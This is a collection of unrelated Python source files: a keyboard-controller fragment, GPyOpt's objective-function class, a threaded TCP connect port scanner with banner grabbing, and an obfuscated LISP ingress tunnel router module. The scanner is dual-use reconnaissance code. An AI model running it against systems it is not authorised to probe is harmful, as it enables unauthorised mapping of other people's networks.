            self.press_release(KEYBOARD_CONTROLL['TOGGLE_GEARS'])

    def set_gear(self, first):
        # NOTE(review): appears dead/broken — self.digital_input is never set
        # on this class (it lives on State), so calling this would raise
        # AttributeError. Confirm before use.
        self.gears = self.digital_input[DIGITAL_PORT_MAPPER['GEARS']]

    def press_release(self, key, release_time=0.1):
        """Tap *key* asynchronously: press, wait release_time seconds, release.

        NOTE(review): running_threads is checked and updated without a lock,
        so a rapid double trigger could race — confirm if that matters here.
        """
        def assync_press():
            if key in running_threads: return
            running_threads.append(key)
            self.keyboard.press(key);
            time.sleep(release_time)
            self.keyboard.release(key)
            running_threads.remove(key)
        thr = threading.Thread(target=assync_press)
        thr.start()
def rising_edge(old, new):
    """Return True when a digital sample transitions from '0' to '1'."""
    return old == '0' and new == '1'
|
objective.py | # Copyright (c) 2016, the GPyOpt Authors
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import time
import numpy as np
from ...util.general import spawn
#from ...util.general import get_d_moments
# import GPy
# import GPyOpt
class Objective(object):
    """
    General class to handle the objective function internally.
    """

    def evaluate(self, x):
        """Evaluate the objective at x. Subclasses must override."""
        raise NotImplementedError()


class SingleObjective(Objective):
    """
    Class to handle problems with one single objective function.

    param func: objective function.
    param num_cores: number of cores to use in the process of evaluating the objective (default, 1).
    param objective_name: name of the objective function.
    param batch_type: Type of batch used. Only 'synchronous' evaluations are possible at the moment.
    param space: Not in use.
    param output_dim: dimension of the objective's output rows (default, 1).

    .. Note:: the objective function should take 2-dimensional numpy arrays as input and outputs. Each row should
    contain a location (in the case of the inputs) or a function evaluation (in the case of the outputs).
    """

    def __init__(self, func, num_cores = 1, objective_name = 'no_name', batch_type = 'synchronous', space = None, output_dim = 1):
        self.func = func
        self.n_procs = num_cores
        self.num_evaluations = 0
        self.space = space
        self.objective_name = objective_name
        self.output_dim = output_dim

    def evaluate(self, x):
        """
        Performs the evaluation of the objective at x.

        Returns (f_evals, cost_evals): f_evals stacks one output row per input
        location; cost_evals holds the wall-clock time of each evaluation.
        """
        if self.n_procs == 1:
            f_evals, cost_evals = self._eval_func(x)
        else:
            try:
                f_evals, cost_evals = self._syncronous_batch_evaluation(x)
            except Exception:
                # Bug fix: the original printed the warning on every failure
                # and never set parallel_error (the assignment sat in an
                # unreachable else branch). Warn once, remember the failure,
                # then fall back to sequential evaluation.
                if not hasattr(self, 'parallel_error'):
                    print('Error in parallel computation. Fall back to single process!')
                    self.parallel_error = True
                f_evals, cost_evals = self._eval_func(x)
        return f_evals, cost_evals

    def _eval_func(self, x):
        """
        Performs sequential evaluations of the function at x (single location or batch). The computing time of each
        evaluation is also provided.
        """
        cost_evals = []
        f_evals = np.empty(shape=[0, self.output_dim])
        for i in range(x.shape[0]):
            st_time = time.time()
            rlt = self.func(np.atleast_2d(x[i]))
            f_evals = np.vstack([f_evals, rlt])
            cost_evals += [time.time() - st_time]
        return f_evals, cost_evals

    def _syncronous_batch_evaluation(self, x):
        """
        Evaluates the function a x, where x can be a single location or a batch. The evaluation is performed in parallel
        according to the number of accessible cores.
        """
        from multiprocessing import Process, Pipe

        # --- parallel evaluation of the function
        divided_samples = [x[i::self.n_procs] for i in range(self.n_procs)]
        pipe = [Pipe() for i in range(self.n_procs)]
        proc = [Process(target=spawn(self._eval_func), args=(c, k)) for k, (p, c) in zip(divided_samples, pipe)]
        [p.start() for p in proc]
        [p.join() for p in proc]

        # --- time of evaluation is set to constant (=1). This is one of the hypothesis of synchronous batch methods.
        f_evals = np.zeros((x.shape[0], 1))
        cost_evals = np.ones((x.shape[0], 1))
        i = 0
        for (p, c) in pipe:
            f_evals[i::self.n_procs] = p.recv()[0]  # throw away costs
            i += 1
        return f_evals, cost_evals

    def _asyncronous_batch_evaluation(self, x):
        """
        Performs the evaluation of the function at x while other evaluations are pending.
        """
        # --- TODO
        pass
|
scanner1.0.py | # coding=utf-8
'''
Author:joe
Description: scanner of InterNet servers
1、模块 argparse(Generic Operation System Services)
2、获取命令行输入的目标地址和端口 :Host,Port
3、-H host -p port
4、多线程 加锁
'''
import argparse
import socket
import threading
SCREEN_LOCK = threading.Semaphore(value=1)
def get_tgthostandport():
    '''
    Parse the target host and port(s) from the command line (-H host -p port...).

    Parameters:
        None
    Returns:
        [host, ports] — host is a string (or None), ports a list of ints (or None)
    '''
    parser = argparse.ArgumentParser(description="Get Target Host and Port")
    parser.add_argument('-H', dest='Host', help='input host')
    parser.add_argument('-p', dest='Port', nargs='+', type=int, help='input port')
    parsed = parser.parse_args()
    return [parsed.Host, parsed.Port]
def conn_scan(tg_host, tg_port):
    '''
    Try a TCP connect to (tg_host, tg_port) and report open/closed.

    Paremters:
        tg_host, tg_port
    Returns:
        None

    Fixes over the original:
    - b"hello/r/n" used forward slashes; the intended probe is b"hello\\r\\n".
    - the socket is now created before the try block, so the finally clause
      can never hit a NameError when socket() itself fails.
    - the bare "except:" is narrowed to OSError (all socket errors).
    '''
    conn_stk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        conn_stk.connect((tg_host, tg_port))
        conn_stk.send(b"hello\r\n")
        reslut = conn_stk.recv(100)
        # serialize console output across scanner threads
        with SCREEN_LOCK:
            print('[+]%d tcp is open'%(tg_port))
            print('[+]' + str(reslut))
    except OSError:
        with SCREEN_LOCK:
            print('[-]%d tcp closed'%(tg_port))
    finally:
        conn_stk.close()
'''
ADDRESS = get_tgthostandport()
print(ADDRESS)
'''
def port_scan():
    '''
    Resolve the target host from the command line and scan each requested
    port on a separate thread via conn_scan().

    Paramters: None
    Returns: None

    Fixes over the original:
    - the command line was parsed TWICE (one get_tgthostandport() call per
      element); it is now parsed once and unpacked.
    - bare "except:" clauses narrowed to OSError (covers gaierror/herror).
    '''
    tg_host, tg_ports = get_tgthostandport()
    try:
        tg_ip = socket.gethostbyname(tg_host)
    except OSError:
        print('Can not get target ip by %s'%(tg_host))
        return
    try:
        tg_name = socket.gethostbyaddr(tg_ip)
        print(tg_name)
        print("\n scan reslut for:" + tg_name[0])  # "reslut" (sic) kept for output compatibility
    except OSError:
        print('\n[+]scan reslut for: ' + tg_ip + ' : ' + tg_host)
    socket.setdefaulttimeout(10)
    for tgport in tg_ports:
        print('sanning port :' + str(tgport))  # "sanning" (sic) kept for output compatibility
        t = threading.Thread(target=conn_scan, args=(tg_host, int(tgport)))
        t.start()
# port_scan()
# Script entry point: parse -H/-p from the command line and scan the ports.
if __name__ == '__main__':
    port_scan()
|
lisp-itr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import select
import threading
import pcappy
import time
import os
import commands
import struct
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
# Obfuscated module globals (machine-obfuscated lispers.net source; the
# "if N - N:" statements scattered through this file are no-op filler
# emitted by the obfuscator).
II1iII1i = [ None , None , None ]  # send sockets: [0]=IPv4, [1]=IPv6, [2]=IPC listen socket
oO0oIIII = None  # "lisp-itr" IPC listen socket
Oo0oO0oo0oO00 = None  # "lispers.net-itr" IPC listen socket
i111I = None  # listen socket bound to ephemeral port iiI1iIiI
II1Ii1iI1i = None  # IPv4 listen socket bound to ephemeral port OOo
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )  # ephemeral control port
OOo = lisp . lisp_get_ephemeral_port ( )  # second ephemeral port
Ii1IIii11 = None  # raw IPv4 socket (IPPROTO_RAW) for packet output
Oooo0000 = None  # raw IPv6 socket (skipped on Raspbian)
i11 = None  # presumably the periodic timer handle — NOTE(review): only locals are ever assigned
I11 = None  # not referenced in this chunk
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
oo0O000OoO = False  # flag; purpose not visible in this chunk — TODO confirm
if 34 - 34: I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
i1iIIi1 = threading . Lock ( )  # lock; not used within this chunk
if 50 - 50: i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
def IIiiIiI1(parameter):
    """Show-command handler: render ITR status via lispconfig."""
    return lispconfig.lisp_itr_rtr_show_command(parameter, "ITR", [])
if 41 - 41: OoOoOO00
if 13 - 13: Oo0Ooo . i11iIiiIii - iIii1I11I1II1 - OoOoOO00
if 6 - 6: I1IiiI / Oo0Ooo % Ii1I
if 84 - 84: i11iIiiIii . o0oOOo0O0Ooo
if 100 - 100: Ii1I - Ii1I - I1Ii111
if 20 - 20: OoooooooOO
if 13 - 13: i1IIi - Ii1I % oO0o / iIii1I11I1II1 % iII111i
def oo(parameter):
    """Show-command handler: render the ITR crypto-key list."""
    return lispconfig.lisp_show_crypto_list("ITR")
if 68 - 68: I11i + OOooOOo . iIii1I11I1II1 - IiII % iIii1I11I1II1 - ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
def I1i1iii(parameter):
    """Show-command handler: render ITR RLOC-probe state."""
    return lispconfig.lisp_itr_rtr_show_rloc_probe_command("ITR")
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
def oo0(lisp_sockets, lisp_ephem_port):
    """Once-a-minute ITR housekeeping.

    Flushes the per-nonce crypto keys, refreshes the L2-overlay broadcast
    mapping with a new Map-Request, ages out expired map-cache entries, and
    re-arms itself on a 60 second threading.Timer.
    """
    lisp.lisp_set_exception()

    # Drop every crypto key that was keyed by nonce and start fresh.
    for key_list in lisp.lisp_crypto_keys_by_nonce.values():
        for crypto_key in key_list:
            del (crypto_key)
    lisp.lisp_crypto_keys_by_nonce = {}

    # For an L2 overlay, (re)request the broadcast MAC mapping.
    if lisp.lisp_l2_overlay:
        afi = lisp.LISP_AFI_MAC
        iid = lisp.lisp_default_iid
        source_eid = lisp.lisp_address(afi, "0000-0000-0000", 0, iid)
        source_eid.mask_len = 0
        dest_eid = lisp.lisp_address(afi, "ffff-ffff-ffff", 48, iid)
        lisp.lisp_send_map_request(lisp_sockets, lisp_ephem_port, source_eid,
            dest_eid, None)

    # Age out expired map-cache entries.
    lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)

    # Re-arm the periodic timer (note: binds a local, not the module global).
    i11 = threading.Timer(60, oo0, [lisp_sockets, lisp_ephem_port])
    i11.start()
    return
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
def OO0oOoOO0oOO0(lisp_socket):
    """Time out inactive dynamic-EIDs and tell the lisp-etr process, via IPC,
    to unlearn each one; re-arms itself on a threading.Timer."""
    lisp.lisp_set_exception()

    now = lisp.lisp_get_timestamp()
    for db in lisp.lisp_db_list:
        if db.dynamic_eid_configured() == False:
            continue

        delete_list = []
        for dyn_eid in db.dynamic_eids.values():
            last_heard = dyn_eid.last_packet
            if last_heard == None:
                continue
            if last_heard + dyn_eid.timeout > now:
                continue

            # Ask the hardware before declaring the dynamic-EID inactive.
            if lisp.lisp_program_hardware:
                prefix = dyn_eid.dynamic_eid.print_prefix_no_iid()
                if lisp.lisp_arista_is_alive(prefix):
                    lisp.lprint(("Hardware indicates dynamic-EID {} " +
                        "still active").format(lisp.green(prefix, False)))
                    continue

            # Tell the lisp-etr process to unlearn this dynamic-EID.
            eid_str = dyn_eid.dynamic_eid.print_address()
            ipc = "learn%{}%None".format(eid_str)
            ipc = lisp.lisp_command_ipc(ipc, "lisp-itr")
            lisp.lisp_ipc(ipc, lisp_socket, "lisp-etr")

            lisp.lprint("Dynamic-EID {}".format(lisp.bold(
                lisp.green(eid_str, False) + " activity timeout", False)))
            delete_list.append(eid_str)

        # Remove after iterating — can't pop from the dict mid-iteration.
        for eid_str in delete_list:
            db.dynamic_eids.pop(eid_str)

    threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
        OO0oOoOO0oOO0, [lisp_socket]).start()
    return
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
def oOooOo0():
    """Return the local interface names.

    macOS gets a fixed list; elsewhere the names are scraped from ifconfig
    output using the py2-only 'commands' module. Newer ifconfig prints
    ": flags=" where older versions printed "Link encap".
    """
    if lisp.lisp_is_macos():
        return ["en0", "en1", "lo0"]

    marker = "Link encap"
    output = commands.getoutput("ifconfig | egrep '{}'".format(marker))
    if output == "":
        marker = ": flags="
        output = commands.getoutput("ifconfig | egrep '{}'".format(marker))

    devices = []
    for line in output.split("\n"):
        devices.append(line.split(marker)[0].replace(" ", ""))
    return devices
if 36 - 36: IiII
if 36 - 36: ooOoO0o / O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
def I111I1Iiii1i():
    """ITR startup: discover local interfaces and addresses, open the control,
    ephemeral and raw sockets, and start the worker thread and the periodic
    timers. Returns False when the local addresses cannot be determined."""
    global II1iII1i
    global oO0oIIII
    global Oo0oO0oo0oO00
    global i111I
    global II1Ii1iI1i
    global Ii1IIii11, Oooo0000

    lisp.lisp_i_am("itr")
    lisp.lisp_set_exception()
    lisp.lisp_print_banner("ITR starting up")

    # Discover local interfaces, MACs and addresses.
    lisp.lisp_get_local_interfaces()
    lisp.lisp_get_local_macs()
    if lisp.lisp_get_local_addresses() == False:
        return False

    # Control sockets: IPv4/IPv6 senders plus the two named IPC listeners.
    II1iII1i[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
    II1iII1i[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
    oO0oIIII = lisp.lisp_open_listen_socket("", "lisp-itr")
    Oo0oO0oo0oO00 = lisp.lisp_open_listen_socket("", "lispers.net-itr")
    II1iII1i[2] = oO0oIIII

    # Ephemeral-port listeners (Raspbian cannot bind the IPv6 wildcard).
    bind_address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
    i111I = lisp.lisp_open_listen_socket(bind_address, str(iiI1iIiI))
    II1Ii1iI1i = lisp.lisp_open_listen_socket("0.0.0.0", str(OOo))

    # Raw sockets for emitting packets.
    Ii1IIii11 = socket.socket(socket.AF_INET, socket.SOCK_RAW,
        socket.IPPROTO_RAW)
    Ii1IIii11.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
    if lisp.lisp_is_raspbian() == False:
        Oooo0000 = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
            socket.IPPROTO_UDP)

    lisp.lisp_ipc_socket = oO0oIIII

    # Worker thread (OoOOo0OOoO is defined later in this file).
    threading.Thread(target=OoOOo0OOoO).start()

    # Restore state saved by a previous run.
    lisp.lisp_load_checkpoint()

    lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)

    # Periodic housekeeping timer (note: binds a local, not the global i11).
    periodic_timer = threading.Timer(60, oo0, [II1iII1i, iiI1iIiI])
    periodic_timer.start()

    # Dynamic-EID activity-timeout timer.
    threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
        OO0oOoOO0oOO0, [oO0oIIII]).start()
    return True
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
def o0ooooO0o0O():
    """Count the 'prefix {' sub-clauses inside 'lisp database-mapping'
    stanzas of ./lisp.config, i.e. how many database-mapping EID-prefixes
    the configuration declares."""
    count = 0
    in_stanza = False
    with open("./lisp.config", "r") as config:
        for line in config:
            if line == "lisp database-mapping {\n":
                in_stanza = True
            if line == "}\n":
                in_stanza = False
            if in_stanza == False:
                continue
            if line[0] == " " and line.find("prefix {") != -1:
                count += 1
    return count
if 48 - 48: ooOoO0o / I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / i1IIi
if 92 - 92: Oo0Ooo % Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
def O00oOOooo ( ) :
    """Block until every configured database-mapping is processed, then
    return the EID-prefixes.

    Compares the count parsed from ./lisp.config against the entries in
    lisp.lisp_db_list, sleeping between polls, then collects printable
    prefixes for IPv4, IPv6 and MAC EIDs.

    Returns:
        tuple: (all_prefixes, dynamic_prefixes) — lists of EID-prefix
        strings; the second holds only dynamic-EID-configured entries.
    """
    expected = o0ooooO0o0O ( )

    # Poll interval in seconds, overridable via the environment.
    interval = os . getenv ( "LISP_ITR_WAIT_TIME" )
    interval = 1 if ( interval == None ) else int ( interval )

    # Wait until the lisp module has processed every configured mapping.
    while ( len ( lisp . lisp_db_list ) != expected ) :
        lisp . lprint (
            "Waiting {} second(s) for {} database-mapping EID-prefixes, {} processed so far ..." . format (
                interval , expected , len ( lisp . lisp_db_list ) ) )
        time . sleep ( interval )

    all_prefixes = [ ]
    dynamic_prefixes = [ ]
    for entry in lisp . lisp_db_list :
        eid = entry . eid
        if ( not ( eid . is_ipv4 ( ) or eid . is_ipv6 ( ) or eid . is_mac ( ) ) ) :
            continue
        prefix = eid . print_prefix_no_iid ( )
        if ( entry . dynamic_eid_configured ( ) ) :
            dynamic_prefixes . append ( prefix )
        all_prefixes . append ( prefix )

    return ( all_prefixes , dynamic_prefixes )
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
def OoOOo0OOoO ( ) :
    """Start packet capture for the ITR process.

    Builds a pcap filter from the configured EID-prefixes, installs
    kernel iptables filters on Linux, and spawns one capture thread per
    selected interface.  When an external data-plane is in use
    (lisp.lisp_ipc_data_plane) only control-plane traffic is captured.

    NOTE: the 'if N - N:' lines throughout this file are obfuscator
    no-ops (N - N == 0) and never execute their bodies.
    """
    # i1iIIi1 is passed as the last element of each capture thread's
    # args — presumably a shared pcap lock/handle; TODO confirm.
    global i1iIIi1
    if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
    lisp . lisp_set_exception ( )
    if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
    if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
    if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
    if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
    if 17 - 17: i1IIi
    # All configured EID-prefixes, and the dynamic-EID subset.
    oOoOO , Ii1i1 = O00oOOooo ( )
    if 21 - 21: Oo0Ooo
    if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
    if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
    if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
    if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
    if 54 - 54: i1IIi + II111iiii
    if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
    if 5 - 5: Ii1I
    if 46 - 46: IiII
    # When an external data-plane handles packets, restrict capture to
    # control traffic: RLOC-probes (UDP 4342) and LISP trace packets.
    ii1iIi1iIiI1i = None
    if ( lisp . lisp_ipc_data_plane ) :
        lisp . lprint ( lisp . bold ( "Data-plane packet capture disabled" , False ) )
        ii1iIi1iIiI1i = "(udp src port 4342 and ip[28] == 0x28)" + " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
        if 40 - 40: i1IIi % OOooOOo
        if 71 - 71: OoOoOO00
        lisp . lprint ( "Control-plane capture: '{}'" . format ( ii1iIi1iIiI1i ) )
    else :
        lisp . lprint ( "Capturing packets for source-EIDs {}" . format ( lisp . green ( str ( oOoOO ) , False ) ) )
    if 14 - 14: i11iIiiIii % OOooOOo
    if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
    if ( lisp . lisp_pitr ) : lisp . lprint ( "Configured for PITR functionality" )
    if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
    if 9 - 9: Ii1I
    if 59 - 59: I1IiiI * II111iiii . O0
    if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
    if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
    if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
    # Install kernel packet filters (iptables) on Linux unless we are
    # running an L2 overlay.
    i1 = lisp . lisp_l2_overlay
    if ( i1 == False ) :
        if ( lisp . lisp_is_linux ( ) ) : OO0oOOoo ( oOoOO , Ii1i1 )
    if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
    if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
    if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
    if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
    if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
    if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
    # Choose the pcap filter: the control-plane-only filter built above,
    # or a full data-plane filter from the EID-prefix lists.
    if ( ii1iIi1iIiI1i == None ) :
        if ( lisp . lisp_pitr ) :
            i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , [ ] , False , True )
        else :
            i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , Ii1i1 , i1 ,
                False )
        if 57 - 57: OoOoOO00 - I1ii11iIi11i
    else :
        i1I11IiI1iiII = ii1iIi1iIiI1i
    if 50 - 50: I1Ii111 / i1IIi % OoO0O00 . I1IiiI / iII111i
    if 88 - 88: OOooOOo . I11i * o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . I11i
    if 10 - 10: o0oOOo0O0Ooo * Oo0Ooo % O0 * iIii1I11I1II1 . O0 % I1ii11iIi11i
    if 44 - 44: II111iiii / iII111i / I11i % II111iiii / i1IIi . Ii1I
    if 59 - 59: OoooooooOO
    # oOooOo0() is defined elsewhere in this file; presumably returns the
    # list of active capture interfaces — TODO confirm.
    iIiIIi1 = oOooOo0 ( )
    # LISP_PCAP_LIST lets the user restrict capture to chosen interfaces.
    # Intersection = interfaces to capture EIDs on; symmetric difference =
    # remaining RLOC interfaces (probe replies only).
    i1iiiii1 = os . getenv ( "LISP_PCAP_LIST" )
    if ( i1iiiii1 == None ) :
        O0iII1 = ""
        IIII1i = [ ]
    else :
        Ii1IIIIi1ii1I = list ( set ( i1iiiii1 . split ( ) ) & set ( iIiIIi1 ) )
        IIII1i = list ( set ( i1iiiii1 . split ( ) ) ^ set ( iIiIIi1 ) )
        O0iII1 = "user-selected "
        lisp . lprint ( "User pcap-list: {}, active-interfaces: {}" . format ( i1iiiii1 , iIiIIi1 ) )
        if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
        iIiIIi1 = Ii1IIIIi1ii1I
    if 22 - 22: IiII / i11iIiiIii
    if 62 - 62: OoO0O00 / I1ii11iIi11i
    if 7 - 7: OoooooooOO . IiII
    if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
    if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
    if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
    if 92 - 92: ooOoO0o
    # MAC filters can't match on loopback/lispers.net pseudo-interfaces.
    II11iI111i1 = ( i1I11IiI1iiII . find ( "ether host" ) != - 1 )
    for Oo00OoOo in iIiIIi1 :
        if ( Oo00OoOo in [ "lo" , "lispers.net" ] and II11iI111i1 ) :
            lisp . lprint ( ( "Capturing suppressed on interface {}, " + "MAC filters configured" ) . format ( Oo00OoOo ) )
            if 24 - 24: i11iIiiIii - I1Ii111
            continue
        if 21 - 21: I11i
        if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
        # One capture thread per interface; Oo0000oOo is the pcap loop
        # (defined elsewhere in this file).
        ii1 = [ Oo00OoOo , i1I11IiI1iiII , i1iIIi1 ]
        lisp . lprint ( "Capturing packets on {}interface {}" . format ( O0iII1 , Oo00OoOo ) )
        threading . Thread ( target = Oo0000oOo , args = ii1 ) . start ( )
    if 31 - 31: I11i . I1Ii111 * ooOoO0o + i11iIiiIii * oO0o
